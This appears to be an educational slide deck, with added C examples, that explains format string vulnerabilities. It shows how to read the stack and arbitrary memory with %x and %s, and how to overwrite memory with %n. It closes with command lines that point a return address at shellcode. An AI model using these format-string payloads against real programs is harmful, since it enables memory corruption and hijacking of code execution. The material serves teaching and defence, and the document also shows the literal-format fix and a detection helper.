Format String Attacks
AJ
2014.1.18
[MOSUT] Format String Attacks
A story about learning format string attacks and sharing what was learned.
Outline:
*Illustrating format string vulnerabilities
*A case study
+fsa.c
+Compile and setup insecure environment
+Viewing the stack
+Viewing Memory at any location
+Overwriting of arbitrary memory
*So, You Can…
About Me
• Studying at National Chung Cheng University
• A simulator for a 5-axis CNC machine tool
• CUDA programming for real-time collision detection
• 若渴計畫 & MOSUT
Outline
• Illustrating format string vulnerabilities
• A case study
  • fsa.c
  • Compile and set up an insecure environment
  • Viewing the stack
  • Viewing memory at any location
  • Overwriting arbitrary memory
• So, you can…
Format String Vulnerabilities
• The format string comes straight from user input: format string <-> argv[1]
• printf(argv[1])
• strcpy(buff, argv[1])
• snprintf(buf, sizeof buf, argv[1]);
• …
• EX: compile & execute
A Case Study: fsa.c
A Case Study: Compile and Set Up an Insecure Environment
• Compile
  • gcc -g -Wno-format-security -fno-stack-protector fsa.c
• Disable ASLR (address space layout randomization)
  • sudo sysctl -w kernel.randomize_va_space=0
• x86 machine & Ubuntu 12.04
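The slides describe fsa.c only by its shape (a buf[100] on the stack, an int holding 'a', and argv[1] passed to snprintf as the format). The program below is an added example in that shape, not the deck's own fsa.c: it puts the vulnerable call next to the one-line fix (a literal "%s" format, which makes argv[1] plain data), and adds a small audit helper, has_conversion(), that flags input carrying any conversion other than "%%" before it reaches a format sink. The pragma silences the exact warning the deck turns off with -Wno-format-security; leaving -Wformat -Wformat-security on is the cheapest detection for this bug class.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* gcc and clang flag a non-literal format with no arguments; the deck builds
   with -Wno-format-security for the same reason. Silenced here only so the
   vulnerable variant can sit beside the fixed one. */
#pragma GCC diagnostic ignored "-Wformat-security"

/* Vulnerable shape from the slides: argv[1] *is* the format string, so every
   conversion in it pulls a word off the stack (%x), dereferences one (%s)
   or writes through one (%n). */
static int format_unsafe(char *buf, size_t len, const char *user)
{
    return snprintf(buf, len, user);        /* intentionally vulnerable */
}

/* Fix: the format is a string literal; user input is only ever an argument,
   so "%x" or "%n" inside it is copied as text and never interpreted. */
static int format_safe(char *buf, size_t len, const char *user)
{
    return snprintf(buf, len, "%s", user);
}

/* Assumed helper, not from the deck: report whether a string about to reach
   a format sink carries a conversion other than the literal "%%". Useful for
   logging or rejecting suspicious input; the real fix is the literal format. */
static bool has_conversion(const char *s)
{
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        if (p[1] != '%')
            return true;                    /* "%x", "%s", "%n", "%4x", ... */
        p += 2;                             /* "%%" is a literal percent sign */
    }
    return false;
}

int main(int argc, char **argv)
{
    char buf[100];                          /* same layout as the slides: buf[100] ... */
    int x = 'a';                            /* ... and an int holding 97 = 'a' */
    /* constructed default input, the first format string the slides try */
    const char *user = argc > 1 ? argv[1] : "%x.%x.%x.%x.%x";

    if (has_conversion(user))
        fprintf(stderr, "warning: input contains format conversions\n");

    format_safe(buf, sizeof buf, user);
    printf("safe  : %s\n", buf);            /* the conversions appear as text */
    format_unsafe(buf, sizeof buf, user);
    printf("unsafe: %s\n", buf);            /* stack words appear instead */
    return x == 'a' ? 0 : 1;                /* a %n in `user` could have changed x */
}
```

Run it with no argument to see the two outputs side by side; with format_safe the buffer holds the literal "%x.%x.%x.%x.%x", with format_unsafe it holds whatever words sit above the format argument on the stack, exactly the difference the next slides walk through.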
Stack Status before Executing snprintf()
• Stack diagram (from esp downward): ??, ??, ??, x = 97 = 'a', buf[100]
Viewing the Stack: "%x.%x.%x.%x.%x"
• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1]) => snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")
• Stack diagram at the call (from esp): buffer pointer, buffer length, argv[1] pointer (the format string itself lives on the heap), then the words each %x fetches: ?? b7ff3fec, ?? bffff3b4, ?? 0, x = 97 = 'a', buf[100]
• C calling convention: http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html; Richard Reese, 透視C語言指標 p.128
• Each %x fetches the next word after the format-string argument, so the fourth %x reads x and the fifth reads buf itself
• Result: buf[100] = b7ff3fec.bffff3b4.0.61.66663762 (66663762 is "ff7b" in ASCII: the fifth %x reads from buf while snprintf is filling it, so its value depends on the order in which the "copy" and "fetch" steps happen)
Viewing the Stack: "aaaa.%x.%x.%x.%x.%x"
• Format string = aaaa.%x.%x.%x.%x.%x
• 'a' is 0x61 in ASCII
• snprintf(buf, sizeof buf, "aaaa.%x.%x.%x.%x.%x")
• Stack diagram (from esp): buffer pointer, buffer length, argv[1] pointer, then %x <- ?? b7ff3fec, %x <- ?? bffff3b4, %x <- ?? 0, %x <- x = 97 = 'a', %x <- buf[100]
• Result: buf[100] = aaaa.b7ff3fec.bffff3a4.0.61.61616161 (the fifth %x reads the first four bytes of buf, which now hold "aaaa")
Viewing Memory at Any Location
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%x
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%s
• The four bytes copied to buf[0] are fetched back as the fifth argument: buf[0] = bffff2f8, the address of x = 97 = 'a', so %s prints the memory at bffff2f8
Overwriting Arbitrary Memory
• When the %n field is encountered in the format string, the number of characters written so far is stored through the pointer fetched as its argument
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%n
• buf[0] = bffff2f8 again supplies the pointer; 26 (??) characters plus alignment give 28 characters written when %n is reached, so x at bffff2f8 becomes 28 = 0x1c
So, You Can…
• Format string vulnerabilities
  • Viewing the stack
  • Finding return addresses
  • Overwriting return addresses
  • Overwriting return addresses to point to shellcode
• EX:
  $ ./a.out $(printf "return address").%x.%x.%x.%x.%n => return address = 28
  $ ./a.out $(printf "return address").%x.%x.%x.%4x.%n => return address = 30
  $ ./a.out $(printf "return address").%x.%x.%x.%8x.%n => return address = 34
  $ ./a.out $(printf "return address").%Xx.%Yx.%Zx.%Ax.%n => return address = shellcode address
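The 28 / 30 / 34 progression above comes entirely from how many bytes the conversions before %n emit. The block below is an added example, not from the deck, that reproduces that counting with a literal format and a %n that stores into a local int: "XXXX" stands in for the 4 address bytes the slides place at the front of the string, and the three hex words are the constructed stack values from the "Viewing the Stack" slides. It shows why %n is the dangerous conversion (it is a write, and the attacker-controlled widths choose the value) and why glibc's _FORTIFY_SOURCE aborts on %n in any format string that is not in read-only memory.

```c
#include <stdio.h>

/* Return the value %n stores after "XXXX." and four hex fields, the last of
   them padded to `width`. All values are constructed to match the slides;
   %n writes into the local `count`, never into program memory elsewhere. */
static int count_at_n(int width)
{
    char out[128];
    int count = -1;
    /* %*x takes its minimum field width from the next argument;
       %n stores the number of bytes emitted before it was reached. */
    snprintf(out, sizeof out, "XXXX.%x.%x.%x.%*x.%n",
             0xb7ff3fecu, 0xbffff3b4u, 0u, width, 0x61u, &count);
    /* "XXXX." (5) + "b7ff3fec." (9) + "bffff3b4." (9) + "0." (2) = 25,
       then the padded "61" plus its trailing "." */
    return count;
}

int main(void)
{
    /* Same progression as the slide: %x -> 28, %4x -> 30, %8x -> 34 */
    printf("%%x : %d\n", count_at_n(0));
    printf("%%4x: %d\n", count_at_n(4));
    printf("%%8x: %d\n", count_at_n(8));
    return 0;
}
```

Only the width changes between the three calls, which is the whole mechanism: the deck's last line, with %Xx.%Yx.%Zx.%Ax, is choosing widths so that the running count equals some target value. On the defensive side, the same count is what a literal format makes unreachable: with snprintf(buf, sizeof buf, "%s", user) there is no %n to execute at all.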
You can overwrite arbitrary memory if there are format string vulnerabilities.
Reference
• Tim Newsham, "Format String Attacks"
  http://www.thenewsh.com/~newsham/format-string-attacks.pdf
• stackoverflow, "How can a Format-String vulnerability be exploited?"
  http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited
• Paul Haas, "Advanced Format String Attacks"
  http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf
• David Brumley, course slides
  http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf
• Scut et al., "Exploiting Format String Vulnerabilities"
  http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf